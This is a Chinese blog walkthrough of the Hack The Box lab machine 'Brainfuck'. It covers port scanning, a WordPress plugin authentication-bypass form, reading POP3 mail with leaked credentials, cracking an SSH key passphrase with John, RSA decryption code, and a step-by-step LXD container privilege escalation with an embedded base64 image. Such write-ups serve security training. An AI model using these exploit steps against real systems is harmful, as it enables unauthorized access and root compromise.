【Hack The Box】linux练习-- Brainfuck

最新推荐文章于 2023-05-04 15:44:57 发布
最新推荐文章于 2023-05-04 15:44:57 发布
阅读量905 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux 运维 服务器 Hack The Box 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127740885
版权

HTB 学习笔记

【Hack The Box】linux练习-- Brainfuck

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94d0b334e9a537c5acb980df2a54a5f0 (RSA)
|   256 6bd5dc153a667af419915d7385b24cb2 (ECDSA)
|_  256 23f5a333339d76d5f2ea6971e34e8e02 (ED25519)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: USER PIPELINING UIDL SASL(PLAIN) RESP-CODES AUTH-RESP-CODE CAPA TOP
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: ENABLE LITERAL+ Pre-login more IMAP4rev1 post-login SASL-IR ID listed capabilities have AUTH=PLAINA0001 OK IDLE LOGIN-REFERRALS
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb

web枚举

在这里插入图片描述发现只有静态页面,只种情况下要么存在目录爆破的情况,要么需要做host,而未知的host信息通常去nmap看有没有,或者是看页面登录有无跳转
nmap信息如下

commonName=brainfuck.htb/organizationName=Brainfuck
Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative
Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb

gedit /etc/hosts

所以我们要把这个写入host文件

然后直接访问这个即可
https://www.brainfuck.htb/
还有另外一个
https://sup3rs3cr3t.brainfuck.htb
在这里插入图片描述orestis发现一个可疑用户名,并且也发现了这是一个wp站点
我们按照惯例扫描一下目录

扫描方法随意,我加了php的后缀,反正啥也没扫出来
在这里插入图片描述再根据wpscan来扫描一下漏洞,关于wps我们需要重点关注的是有五已经安装的插件,而后才是cms的版本漏洞

wpscan --url https://brainfuck.htb/  -e u --api-token aGVBtnUBzh8Gx1PxYsWpgX06Bsa05TO5rtipCRHesf8 --disable-tls-checks

存在的用户有这两个
在这里插入图片描述
看到安装了插件功能,而这个插件正是非常脆弱的
在这里插入图片描述searchsploit wordpress Plugin wp support
在这里插入图片描述然后在谷歌也是找到了别人写的脚本,如下
在这里插入图片描述
自己搭建一个python服务器,而后浏览器访问本地即可

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
         Username: <input type="text" name="username" value="admin">
         <input type="hidden" name="email" value="orestis@brainfuck.htb">
         <input type="hidden" name="action" value="loginGuestFacebook">
         <input type="submit" value="Login">
        </form>

出现一个界面,我们输入用户,就可以不用密码而进入该账户了

然后页面会空白,这个时候再把url多的一些删掉只留这么些
回车,就能看到了
在这里插入图片描述我们发现了smtp的插件,也发现了以往的主题脆弱点无法使用,进一步的枚举,发现了设置页面有账户以及密码,f12检查可以找到密码
在这里插入图片描述
在这里插入图片描述

smtp枚举

nc 10.129.228.97 110
list
retr 1
retr 2

在这里插入图片描述www-data

在这里插入图片描述
username: orestis
password: kIEnnfEKJ#9UmdO

ssh尝试

尝试ssh
发现ssh不能登录
在这里插入图片描述

web的第二次尝试

由于咱们之前加host的时候有两个dns
这次尝试一下第二个

在这里插入图片描述在这里插入图片描述
在这里插入图片描述看到第二个被加密了,但是我们要找共同点

在这里插入图片描述

在这里插入图片描述mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja

很明显这些都是经过了加密
而通过这一个信息,我猜测这是https可能是,我拿去尝试解密一下

密码学

Orestis - Hacking for fun and profit
加密成了
Pieagnm - Jkoijeg nbw zwx mle grwsnn

https://www.braingle.com/brainteasers/codes/onetimepad.php
https://cryptii.com/

Vigenere Cipher解密

在这里插入图片描述
得到key
fuckmybrain

然后在第二个网站解密
在这里插入图片描述得到了存在rsa的网址
在这里插入图片描述

ssh密钥爆破

python /usr/share/john/ssh2john.py id_rsa > 1.txt
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt
在这里插入图片描述
在这里插入图片描述发现lsd组,还有几个东西
在这里插入图片描述看了这个加密规则认为这是rsa,关键就在于n=p*q
这就是rsa的算法

rsa解密

p,q,e三个数值来源于给出的信息

def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y

def main():

    p = 
    q = 
    e = 
    ct = 
    # compute n
    n = p * q

    # Compute phi(n)
    phi = (p - 1) * (q - 1)

    # Compute modular inverse of e
    gcd, a, b = egcd(e, phi)
    d = a

    print( "n:  " + str(d) );

    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print( "pt: " + str(pt) )

if __name__ == "__main__":
    main()

会得到一个pt和n
然后进入python命令行

>>> pt =  
>>> f"{pt:x}"
>>> bytes.fromhex(f"{pt:x}").decode()

在这里插入图片描述看这里面debug.txt有三段,就分别是p,q,e
output.txt是ct
下面得出了ct
在这里插入图片描述

>>> pt =  
>>> f"{pt:x}"
>>> bytes.fromhex(f"{pt:x}").decode()

在这里插入图片描述

lxd提权(我喜欢把这称之为烂兄弟提权)

1. 传输,这是alphina的base64
echo QlpoOTFBWSZTWaxzK54ABPR/p86QAEBoA//QAA3voP/v3+AACAAEgACQAIAIQAK8KAKCGURPUPJGRp6gNAAAAGgeoA5gE0wCZDAAEwTAAADmATTAJkMAATBMAAAEiIIEp5CepmQmSNNqeoafqZTxQ00HtU9EC9/dr7/586W+tl+zW5or5/vSkzToXUxptsDiZIE17U20gexCSAp1Z9b9+MnY7TS1KUmZjspN0MQ23dsPcIFWwEtQMbTa3JGLHE0olggWQgXSgTSQoSEHl4PZ7N0+FtnTigWSAWkA+WPkw40ggZVvYfaxI3IgBhip9pfFZV5Lm4lCBExydrO+DGwFGsZbYRdsmZxwDUTdlla0y27s5Euzp+Ec4hAt+2AQL58OHZEcPFHieKvHnfyU/EEC07m9ka56FyQh/LsrzVNsIkYLvayQzNAnigX0venhCMc9XRpFEVYJ0wRpKrjabiC9ZAiXaHObAY6oBiFdpBlggUJVMLNKLRQpDoGDIwfle01yQqWxwrKE5aMWOglhlUQQUit6VogV2cD01i0xysiYbzerOUWyrpCAvE41pCFYVoRPj/B28wSZUy/TaUHYx9GkfEYg9mcAilQ+nPCBfgZ5fl3GuPmfUOB3sbFm6/bRA0nXChku7aaN+AueYzqhKOKiBPjLlAAvxBAjAmSJWD5AqhLv/fWja66s7omu/ZTHcC24QJ83NrM67KACLACNUcnJjTTHCCDUIUJtOtN+7rQL+kCm4+U9Wj19YXFhxaXVt6Ph1ALRKOV9Xb7Sm68oF7nhyvegWjELKFH3XiWstVNGgTQTWoCjDnpXh9+/JXxIg4i8mvNobXGIXbmrGeOvXE8pou6wdqSD/F3JFOFCQrHMrng= | base64 -d > bob.tar.bz2

2. 导入镜像
lxc image import bob.tar.bz2 --alias bobImage

3. 查看是否成功
lxc image list
3. 创建
lxc init bobImage bobVM -c security.privileged=true
4. 指向root
lxc config device add bobVM realRoot disk source=/ path=r
5. 开机
lxc start bobVM
6. 检查
lxc list
7. 获取shell
lxc exec bobVM -- /bin/bash
8. 进入目录
cd /r/root/
9. 随心所欲
cat root.txt

在这里插入图片描述
看到没有可利用的,所以我们自己拉一个
在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
brainfuck-mode:Emacs 的 Brainfuck 模式
07-01
Brainfuck-mode.el 这个库可以帮助您在 Emacs 中编写脑筋急转弯。 这也是一个使用 langdoc 定义帮助文档函数的例子。 要求: Emacs 24 或更高版本语言文档您可以通过使用package-install来安装它。 要使用此包,请将...
hackthebox-brainfuck(考点:dns/wordpress漏洞/smtp/110pop3/密码学)
冬萍子癸水
04-19 2904
nmap C:\root\Desktop> nmap -A 10.10.10.17 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 09:13 EDT Nmap scan report for 10.10.10.17 Host is up (0.33s latency). Not shown: 995 filtered ports ...
HTB打靶日记:Brainfuck
m0_73998094的博客
12-25 784
HTB打靶日记:Brainfuck
No.99-HackTheBox-Linux-Brainfuck-Walkthrough渗透学习
qq_34801745的博客
05-15 759
** HackTheBox-Linux-Brainfuck-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/17 靶机难度:初级(3.5/10) 靶机发布日期:2017年10月17日 靶机描述: Brainfuck, while not having any one step that is too difficult, requires many different steps and exploits to comp
Hack the box靶机 brainfuck
菜浪马废的博客
05-19 560
写入/etc/hosts wordpass 上wpscan 找到版本 发现有漏洞 创建html文件 本地运行
hackthebox - frolic (考点: 信息搜集 & ook解密 & base解密 &zip 解密 & xxd解密 & brainfuck解密 & playsms安全)
冬萍子癸水
05-14 1786
1 扫描 22想到可能有ssh登录,139 445想到smb利用,web开在了9999进去搜集信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |
brainfuck-on-genetics:遗传算法与brainfuck
06-17
在我自己的 Brainfuck 解释器支持下,这些遗传算法根据目标函数修改 Brainfuck 程序。 来源包含构建遗传算法的一般框架(参见de.fxnn.genetics )和Brainfuck 程序的实现(参见de.fxnn.brainfuckongenetics )。 ...
forth-to-brainfuck:从一个子集到brainfuck的翻译
06-10
$ cat forth.fs | forth-to-brainfuck > brainfuck.bf 例子 $ cat fizzbuzz.fs : emit-fizz 102 emit 105 emit 122 emit 122 emit ; : emit-buzz 98 emit 117 emit 122 emit 122 emit ; : fizzbuzz ( -- ) 1 ...
brainfuck-php:Brainfuck 实施
07-10
Brainfuck-php Brainfuck 是一种具有 8 条指令的图灵完备语言。 例子 你好,世界: >+++++++++[<++++++++>-]<.>+++++++[<++++>-]<+.+++++++..+++.>>>++++++++[<++++>-] <.>>>++++++++++[<++...
python-brainfuck:用Python编写的Brainfuck解释器
03-21
python-brainfuck 用Python编写的Brainfuck解释器。 要求 类似于UNIX的操作系统 吉特 Python 本地安装 HTTPS $ git clone https://github.com/aminnairi/python-brainfuck $ cd python-brainfuck SSH协议 $ git ...
Python-systemf一个brainfuck解释器支持Linux系统调用
08-12
systemf:一个brainfuck解释器支持Linux系统调用
BrainFuck 人肉编译规则
fushuangdage的博客
11-08 6022
简介Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 也算是一个奇葩语言吧,不过好像没啥实际作用,因为太轻量了,只能用于表示简单的某些简短的字符串(推荐装逼表白使用吧,其它大概没啥卵用),解析规则还挺有意思的,好久没写博客了,记录一下上午研究成果.
废物的靶场日记 hackthebox-lame+brainfuck
m0_53302733的博客
03-27 1552
废物的靶场日记 hackthebox-lame+brainfuck 之前都是做active的机器 为什么突然开始做简单的退役靶机了呢 因为打算过段时间去考个oscp 看到了一份htb上应该做的清单 就先一个个做下去吧 Lame easy难度 靶机IP 10.10.10.3 nmap -sV -A -Pn 10.10.10.3 好像是不能ping的 加个-Pn 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.
HTB-Brainfuck
TA不懒,但还没有添加简介
05-04 615
HTB-Brainfuck
Hack The Boxlinux练习-- SolidState
人间体佐菲的博客
11-09 405
Hack The Boxlinux练习-- SolidState
Hack The Box】windows练习-- Conceal
人间体佐菲的博客
11-01 518
Hack The Box】windows练习-- Conceal
htb-bastion
qq_45766062的博客
02-22 620
bastion介绍 这是一个运行windows的机器,并且可以连ssh。 nmap 先是nmap扫一下: Nmap scan report for 10.10.10.134 Host is up (0.32s latency). Not shown: 994 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (proto
Couldn't connect to host, port: smtp.alibaba.com, 25错误解决办法
tb_520的博客
06-30 5899
com.sun.mail.util.MailConnectException: Couldn't connect to host, port: smtp.alibaba.com, 25; timeout -1; nested exception is: java.net.ConnectException: Connection timed out (Connection timed o...
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2144
Vulnhub DC-1、DC-2靶机通关手册
brainfuck编译器
最新发布
08-23
Brainfuck编译器是一种适用于x86和64位Linux系统的编译器,它可以将Brainfuck源代码直接汇编、编译和链接成可执行文件。 Brainfuck编程语言是一种相对较难理解的语言,其解释器需要通过移动指针和对值进行加减操作来执行程序。尽管它的Hello World程序可能不太容易理解,但经过一段时间的学习和实践,大家仍然可以逐渐掌握这种语言,并尝试使用它进行加减乘除等操作。 如果你对Brainfuck编译器感兴趣,你可以查看https://code.csdn.net/xiaoli_ch/zombie/tree/master/main.cpp的链接,这是一个可以在C++语言下实现的Brainfuck编译器的示例代码。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [PBFC - Portable Brainfuck Compiler:x86和x64 Brainfuck编译器-开源](https://download.csdn.net/download/weixin_42128988/17713338)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [计算机语言BrainFuck的编译器,官方发布的版本(转载)](https://blog.csdn.net/key1213/article/details/19247215)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [brainfuck 的 c++ 编译器代码](https://blog.csdn.net/xiaoli_ch/article/details/34225641)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值